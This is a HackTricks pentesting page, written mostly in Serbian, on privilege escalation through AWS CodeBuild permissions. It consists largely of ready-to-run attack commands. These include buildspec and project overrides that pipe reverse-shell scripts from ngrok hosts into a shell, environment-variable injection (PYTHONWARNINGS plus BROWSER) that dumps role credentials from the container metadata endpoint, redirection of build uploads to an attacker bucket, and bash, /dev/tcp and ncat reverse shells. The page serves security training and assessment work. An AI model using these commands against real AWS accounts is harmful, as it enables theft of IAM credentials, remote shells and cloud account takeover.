AWS - Codebuild Privesc

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

codebuild

Više informacija potražite u:

AWS - Codebuild Enum

codebuild:StartBuild | codebuild:StartBuildBatch

Dovoljno je imati samo jednu od ovih dozvola da bi se pokrenuo build sa novim buildspec i ukrao token iam role dodeljene projektu:

cat > /tmp/buildspec.yml <<EOF
version: 0.2

phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml

Napomena: Razlika između ova dva komanda je u tome da:

  • StartBuild pokreće jedan build job koristeći specifičan buildspec.yml.
  • StartBuildBatch vam omogućava da pokrenete batch buildova, sa složenijim konfiguracijama (npr. pokretanje više buildova paralelno).

Potencijalni uticaj: Direktan privesc na pridružene AWS CodeBuild role.

StartBuild Override varijabli okruženja

Čak i ako ne možete da izmenite projekat (UpdateProject) i ne možete da prepišete buildspec, codebuild:StartBuild i dalje omogućava prepisivanje varijabli okruženja u vreme builda putem:

  • CLI: --environment-variables-override
  • API: environmentVariablesOverride

Ako build koristi varijable okruženja za kontrolu ponašanja (destination buckets, feature flags, proxy settings, logging, itd.), ovo može biti dovoljno da exfiltrate secrets koje build role može pristupiti ili da se dobije code execution unutar builda.

Primer 1: Redirect Artifact/Upload Destination to Exfiltrate Secrets

Ako build objavljuje artefakt u bucket/putanju kontrolisanu varijablom okruženja (na primer UPLOAD_BUCKET), prepišite je na bucket koji kontroliše napadač:

export PROJECT="<project-name>"
export EXFIL_BUCKET="<attacker-controlled-bucket>"

export BUILD_ID=$(aws codebuild start-build \
--project-name "$PROJECT" \
--environment-variables-override name=UPLOAD_BUCKET,value="$EXFIL_BUCKET",type=PLAINTEXT \
--query build.id --output text)

# Wait for completion
while true; do
STATUS=$(aws codebuild batch-get-builds --ids "$BUILD_ID" --query 'builds[0].buildStatus' --output text)
[ "$STATUS" = "SUCCEEDED" ] && break
[ "$STATUS" = "FAILED" ] || [ "$STATUS" = "FAULT" ] || [ "$STATUS" = "STOPPED" ] || [ "$STATUS" = "TIMED_OUT" ] && exit 1
sleep 5
done

# Example expected location (depends on the buildspec/project logic):
aws s3 cp "s3://$EXFIL_BUCKET/uploads/$BUILD_ID/flag.txt" -
Primer 2: Python Startup Injection via PYTHONWARNINGS + BROWSER

Ako build pokreće python3 (uobičajeno u buildspecs), ponekad možete dobiti izvršavanje koda bez diranja buildspec-a zloupotrebom:

  • PYTHONWARNINGS: Python rešava polje category i importuje dotted paths. Postavljanjem na ...:antigravity.x:... prisiljavate uvoz stdlib modula antigravity.
  • antigravity: poziva webbrowser.open(...).
  • BROWSER: kontroliše šta webbrowser izvršava. Na Linuxu je odvojen sa :. Korišćenjem #%s čini URL argument shell komentarom.

Ovo može da se iskoristi da se ispišu CodeBuild role credentials (sa http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI) u CloudWatch logs, i potom ih povratite ako imate dozvole za čitanje logova.

Proširivo: StartBuild JSON request for the PYTHONWARNINGS + BROWSER trick ```json { "projectName": "codebuild_lab_7_project", "environmentVariablesOverride": [ { "name": "PYTHONWARNINGS", "value": "all:0:antigravity.x:0:0", "type": "PLAINTEXT" }, { "name": "BROWSER", "value": "/bin/sh -c 'echo CREDS_START; URL=$(printf \"http\\\\072//169.254.170.2%s\" \"$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\"); curl -s \"$URL\"; echo CREDS_END' #%s", "type": "PLAINTEXT" } ] } ```

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Napadač sa iam:PassRole, codebuild:CreateProject, i codebuild:StartBuild ili codebuild:StartBuildBatch dozvolama mogao bi eskalirati privilegije na bilo koju codebuild IAM ulogu kreiranjem i pokretanjem takvog projekta.

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

Potencijalni uticaj: Direktan privesc na bilo koju AWS Codebuild ulogu.

Warning

U Codebuild container fajlu /codebuild/output/tmp/env.sh se nalaze svi env vars potrebni za pristup metadata credentials.

Ovaj fajl sadrži env variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI koja sadrži URL path za pristup credential-ima. Biće nešto poput ovoga /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Dodajte to na URL http://169.254.170.2/ i moći ćete da dump-ujete role credentials.

Pored toga, on takođe sadrži env variable ECS_CONTAINER_METADATA_URI koja sadrži kompletan URL za dobijanje metadata info about the container.

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Kao i u prethodnom odeljku, ako umesto kreiranja build projekta možete da ga modifikujete, možete navesti IAM Role i ukrasti token

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Potencijalni uticaj: Direktan privesc na bilo koju AWS Codebuild ulogu.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Poput prethodnog dela, ali bez iam:PassRole dozvole, možete zloupotrebiti ove dozvole da izmenite postojeće Codebuild projekte i pristupite ulozi koja im je već dodeljena.

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Potencijalni uticaj: Direktni privesc na prikačene AWS Codebuild roles.

SSM

Ako imate dovoljne dozvole za pokretanje ssm sesije, moguće je ući inside a Codebuild project koji se gradi.

The codebuild project will need to have a breakpoint:

phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

Zatim:

aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

For more info pogledajte dokumentaciju.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

Attacker koji može da pokrene/ponovo pokrene build određenog CodeBuild projekta koji čuva svoj buildspec.yml fajl na S3 bucket na koji attacker ima write access, može dobiti izvršavanje komandi u CodeBuild procesu.

Napomena: eskalacija je relevantna samo ako CodeBuild worker ima drugačiju role, po mogućnosti privilegovaniju, od one koju ima attacker.

aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_builds > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

Možete koristiti nešto poput ovog buildspec da biste dobili reverse shell:

version: 0.2

phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Impact: Direct privesc na ulogu koju koristi AWS CodeBuild worker, koja obično ima visoke privilegije.

Warning

Imajte na umu da se buildspec može očekivati u zip formatu, pa bi attacker morao da preuzme, raspakuje, izmeni buildspec.yml iz korenskog direktorijuma, ponovo zapakuje i otpremi

More details could be found here.

Potential Impact: Direct privesc na pridružene AWS Codebuild uloge.

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks